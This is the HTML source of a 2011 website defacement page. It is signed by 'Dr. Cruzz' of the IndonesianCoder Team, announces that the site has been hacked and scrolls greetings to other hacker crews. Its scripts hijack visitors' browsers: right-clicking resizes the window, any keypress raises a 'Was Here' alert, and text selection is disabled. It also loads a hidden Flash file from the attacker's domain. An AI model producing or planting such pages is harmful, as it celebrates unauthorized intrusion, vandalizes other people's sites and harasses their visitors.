<html>
<head>
<title>-| Hacked By Dr. Cruzz &#174; IndonesianCoder Team&#8482;  |-</title><link rel="SHORTCUT ICON" href="http://dr-cruzz.tk/1x.ico">
<script type="text/javascript">
<!--
function radio_player() {
	props=window.open('radioplayer.php?lang=&z=wmp&config=config', 'poppage', 'toolbars=0, scrollbars=0, location=0, statusbars=0, menubars=0, resizable=1, width=320, height=142 left = 100, top = 100');
}
// -->
</script>
<title>New Player</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
.stil1 {color: #FFFFFF}
-->
</style></head>
<body>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td background="http://dr-cruzz.tk/back.jpg" valign="top"><table width="889" border="0" cellspacing="0" cellpadding="0" height="73" align="center">
      <tr>
        <td width="29%" height="60"><img src="http://dr-cruzz.tk/logo.jpg" width="335" height="74"></td>
    </table></td>
  </tr>
</table>
<center>
<br>
<table width="800" border="0" cellspacing="0" cellpadding="0">
  <tr>

<script>
/*
An object-oriented Typing Text script, to allow for multiple instances.
A script that causes any text inside any text element to be "typed out", one letter at a 

time. Note that any HTML tags will not be included in the typed output, to prevent them 

from causing problems. Tested in Firefox v1.5.0.1, Opera v8.52, Konqueror v3.5.1, and IE 

v6.
Browsers that do not support this script will simply see the text fully displayed from the 

start, including any HTML tags.

Functions defined:
  TypingText(element, [interval = 100,] [cursor = "",] [finishedCallback = function()

{return}]):
    Create a new TypingText object around the given element.  Optionally
    specify a delay between characters of interval milliseconds.
    cursor allows users to specify some HTML to be appended to the end of
    the string whilst typing.  Optionally, can also be a function which
    accepts the current text as an argument.  This allows the user to
    create a "dynamic cursor" which changes depending on the latest character
    or the current length of the string.
    finishedCallback allows advanced scripters to supply a function
    to be executed on finishing.  The function must accept no arguments.

  TypingText.run():
    Run the effect.

  static TypingText.runAll():
    Run all TypingText-enabled objects on the page.
*/

TypingText = function(element, interval, cursor, finishedCallback) {
  if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
    this.running = true;	// Never run.
    return;
  }
  this.element = element;
  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  this.interval = (typeof interval == "undefined" ? 100 : interval);
  this.origText = this.element.innerHTML;
  this.unparsedOrigText = this.origText;
  this.cursor = (cursor ? cursor : "");
  this.currentText = "";
  this.currentChar = 0;
  this.element.typingText = this;
  if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  TypingText.all.push(this);
  this.running = false;
  this.inTag = false;
  this.tagBuffer = "";
  this.inHTMLEntity = false;
  this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
  if(this.running) return;
  if(typeof this.origText == "undefined") {
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);	// We haven't finished loading yet.  Have patience.
    return;
  }
  if(this.currentText == "") this.element.innerHTML = "";
//  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  if(this.currentChar < this.origText.length) {
    if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
      this.tagBuffer = "<";
      this.inTag = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
      this.tagBuffer += ">";
      this.inTag = false;
      this.currentText += this.tagBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inTag) {
      this.tagBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
      this.HTMLEntityBuffer = "&";
      this.inHTMLEntity = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
      this.HTMLEntityBuffer += ";";
      this.inHTMLEntity = false;
      this.currentText += this.HTMLEntityBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inHTMLEntity) {
      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else {
      this.currentText += this.origText.charAt(this.currentChar);
    }
    this.element.innerHTML = this.currentText;
    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
    this.currentChar++;
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  } else {
	this.currentText = "";
	this.currentChar = 0;
        this.running = false;
        this.finishedCallback();
  }
}
</script>
<style>
body {
	padding:0;
	margin:0;
	background-image:url( );
	background-repeat: no-repeat;
	background-position:bottom;
background-color: black;
color: #ffffff;
font: normal 100% Xirod;
margin-top: 0px;
margin-left: 0px;
padding: 0;
margin-right: 0px;
}
.style2 {color: #666666}
</style>
<center>
<h1><script language="JavaScript1.2">
var message="I LOVE Us"
var neonbasecolor="red"
var neontextcolor="#FFFFFF"
var neontextcolor2="#ffffff"
var flashspeed=100						// speed of flashing in 
milliseconds
var flashingletters=3						// number of letters 
flashing in neontextcolor
var flashingletters2=1						// number of letters 
flashing in neontextcolor2 (0 to disable)
var flashpause=0						// the pause between flash
-cycles in milliseconds
///No need to edit below this line/////
var n=0
if (document.all||document.getElementById){
document.write('<font color="'+neonbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span id="neonlight'+m+'">'+message.charAt(m)+'</span>')
document.write('</font>')
}
else
document.write(message)

function crossref(number){
var crossobj=document.all? eval("document.all.neonlight"+number) : document.getElementById("neonlight"+number)
return crossobj
}

function neon(){

//Change all letters to base color
if (n==0){
for (m=0;m<message.length;m++)
crossref(m).style.color=neonbasecolor
}

//cycle through and change individual letters to neon color
crossref(n).style.color=neontextcolor

if (n>flashingletters-1) crossref(n-flashingletters).style.color=neontextcolor2
if (n>(flashingletters+flashingletters2)-1) crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor


if (n<message.length-1)
n++
else{
n=0
clearInterval(flashing)
setTimeout("beginneon()",flashpause)
return
}
}

function beginneon(){
if (document.all||document.getElementById)
flashing=setInterval("neon()",flashspeed)
}
beginneon()
</script></h1>

<div id="example1"></div>
<p id="example2"><font color="green" face="Pristina" size="3">


<font color="green" face="Agency FB" size="%6"> <b>This Site Has Been Hacked</b> </font>
<span style="color: #green;"><font size="5" color="green"><pre><b>
 ________             _________             __________         
 \______ \_______     \_   ___ \_______ __ _\____    /________ 
  |    |  \_  __ \    /    \  \/\_  __ \  |  \/     / \___   / 
  |    `   \  | \/    \     \____|  | \/  |  /     /_  /    /  
 /_______  /__|    /\  \______  /|__|  |____/_______ \/_____ \ 
         \/        \/         \/                    \/      \/ 
</b></pre> 
<img border="0" src="http://i48.tinypic.com/2dsn3gw.png" width="600" height="10"><br>
<font color="green" face="Agency FB" size="%5"> <b>Dr. Cruzz Was Here</b> </font><br>
<font color="green" size="%3">Contact Me :</font><font color="#ffffff" face="Agency FB" size="%3"> Dr.cruzz@yahoo.co.id </font><font color="#30ff00" size="%3">.+.</font><font color="#ffffff" face="Agency FB" size="%3"> Cruzz@indonesiancoder.com </font><br>
<font color="green" face="Agency FB" size="%5">Get the Codes and Feel the Soul</font><br>
<img border="0" src="http://dr-cruzz.tk/1x.ico" width="14" height="14">
<a href="http://indonesiancoder.com/" target="_self" class="grey_link">
<font color="green" face="Copperplate Gothic Light"><b>&#169; 2011 IndonesianCoder Team&#8482</b></a>
<img border="0" src="http://dr-cruzz.tk/1x.ico" width="14" height="14">
</p>
<script type="text/javascript">
//Define first typing example:
new TypingText(document.getElementById("example1"));
//Define second typing example (use "slashing" cursor at the end):
new TypingText(document.getElementById("example2"), 50, function(i){
var ar = new Array("_"," ","_"," "," "); return " " + ar[i.length %
ar.length]; });
//Type out examples:
TypingText.runAll();
</script> 
<script language="JavaScript1.2">
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function (&quot;return false&quot;)
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<center>

<hr color="#00AA00" width="500" size="1">

</center>
<center>
<marquee width="470" height="80" direction="left">
<center>
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="80" height="80">
<img border="0" src="http://expclan.comli.com/index_files/43084476ii9.png" width="250" height="75"> 
<img border="0" src="http://demafmipauns.files.wordpress.com/2010/05/sayu0i.jpg" width="120" height="75"> 
<img border="0" src="http://blackhat.com/images/head-bg.png" width="300" height="75">  
<img border="0" src="http://demafmipauns.files.wordpress.com/2010/05/sayu0i.jpg" width="120" height="75"> 
<img border="0" src="http://expclan.comli.com/index_files/43084476ii9.png" width="250" height="75">  
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="80" height="80">
</center>
</pre> </font>
</span>
</center>
<marquee class="lm_tipBox" style="border: 1px solid ; color: #00AA00; padding-top: 0px; font-family: Courier;" width="700" height="20">
<font size="3" face="Pristina">
<img border="0" src="http://www.gaza-hacker.com/cc/images/misc/v.gif" width="14" height="14">
<img border="0" src="http://dr-cruzz.tk/indonesiancoder.ico" width="14" height="14">
<img border="0" src="http://www.gaza-hacker.com/cc/images/misc/v.gif" width="14" height="14">
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Senot a.k.a Selalungantuk
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Don Tukulesto 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Dr. CruZz 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Quick_5ilv3r 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Tukuk 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
X3vir00t 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Bayu5154
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
n4Kula_
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Mr.J0k3r 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Vyc0d
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Ulow
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
k4mpret0
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
ryanaby 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
DX Baon
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Kamtiez 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Xr0b0t 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Ibl13z 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
N4ck0 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Hmei7 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Gonzhack 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Jundab 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Trycyber 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Xadal
<img border="0" src="http://i44.tinypic.com/5a4cvt.pngo" width="16" height="16">
Hakz 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Arianom 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Yur4kh4 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Rifky 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
El-Farhatz 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Budi.Spielberg
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
Josalijoe
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
ReGgae
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
<font face="Copperplate Gothic Light">
All Crew 
<img border="0" src="http://dr-cruzz.tk/1x.ico" width="14" height="14">

<a href="http://indonesiancoder.com/" target="_self" class="grey_link">
INDONESIANCODER TEAM

</a>
<img border="0" src="http://dr-cruzz.tk/1x.ico" width="14" height="14">

<a href="http://magelangcyber.web.id/" target="_self" class="grey_link">
MAGELANGCYBER
</a>

<img border="0" src="http://dr-cruzz.tk/1x.ico" width="14" height="14">

<a href="http://mc-crew.net/" target="_self" class="grey_link">
MALANGCYBER CREW
</a>
<img border="0" src="http://dr-cruzz.tk/1x.ico" width="14" height="14">

<a href="http://kill-9.tk/" target="_self" class="grey_link">
KILL-9 CREW
</a>


 
<img border="0" src="http://i44.tinypic.com/5a4cvt.png" width="16" height="16">
<img border="0" src="http://www.gaza-hacker.com/cc/images/misc/v.gif" width="14" height="14">
<img border="0" src="http://dr-cruzz.tk/indonesiancoder.ico" width="14" height="14">
<img border="0" src="http://www.gaza-hacker.com/cc/images/misc/v.gif" width="14" height="14">
</marquee></font></b></span></p>
</center>
<hr color="#00AA00" size="5">
</b>
</font>
</center>


<embed src="http://dr-cruzz.tk/u.swf" autostart="false" hidden="true" width="10" height="10" align="left"></font></object>



<script>
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("---===[!] Dr. Cruzz a.k.a XcruzzmiX Was Here [!]==---");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('./Defaced By Dr. CruZz');
}
</script>
<script language="JavaScript">function tb5_makeArray(n){ this.length = n; return this.length;
}
tb5_messages = new tb5_makeArray(2);
tb5_messages[0] = "..::|| Dr. CruZz ||::....::|| Indonesian Coder Team ||::..";
tb5_messages[1] = "|..:: Dr. CruZz Indonesian Coder ::..|..::X-CruZz Mix a.k.a Dr. CruZz::..|..::Mas Boy a.k.a Dr. CruZz::..";
tb5_rptType = 'infinite';
tb5_rptNbr = 100;
tb5_speed = 50;
tb5_delay = 50;
var tb5_counter=1;
var tb5_currMsg=0;
var tb5_stsmsg="";
function tb5_shuffle(arr){
var k;
for (i=0; i<arr.length; i++){ k = Math.round(Math.random() * (arr.length - i - 2)) + i; temp = arr[i];arr[i]=arr[k];arr[k]=temp;
}
return arr;
}
tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){ tb5_arr[i] = i; tb5_sts[i] = "_";
}
tb5_arr = tb5_shuffle(tb5_arr);
function tb5_init(n){
var k;
if (n == tb5_arr.length){ if (tb5_currMsg == tb5_messages.length-1){ if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){ clearTimeout(tb5_timerID); return; } tb5_counter++; tb5_currMsg=0; } else{ tb5_currMsg++; } n=0; tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length); tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length); for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){ tb5_arr[i] = i; tb5_sts[i] = "_"; } tb5_arr = tb5_shuffle(tb5_arr); tb5_sp=tb5_delay;
}
else{ tb5_sp=tb5_speed; k = tb5_arr[n]; tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k); tb5_stsmsg = ""; for (var i=0; i<tb5_sts.length; i++) tb5_stsmsg += tb5_sts[i]; document.title = tb5_stsmsg; n++; } tb5_timerID = setTimeout("tb5_init("+n+")", tb5_sp);
}
function tb5_randomizetitle(){ tb5_init(0);
}
tb5_randomizetitle();
</script>
    </div></td>
  </tr>
</table>
</center>
</body>
</html>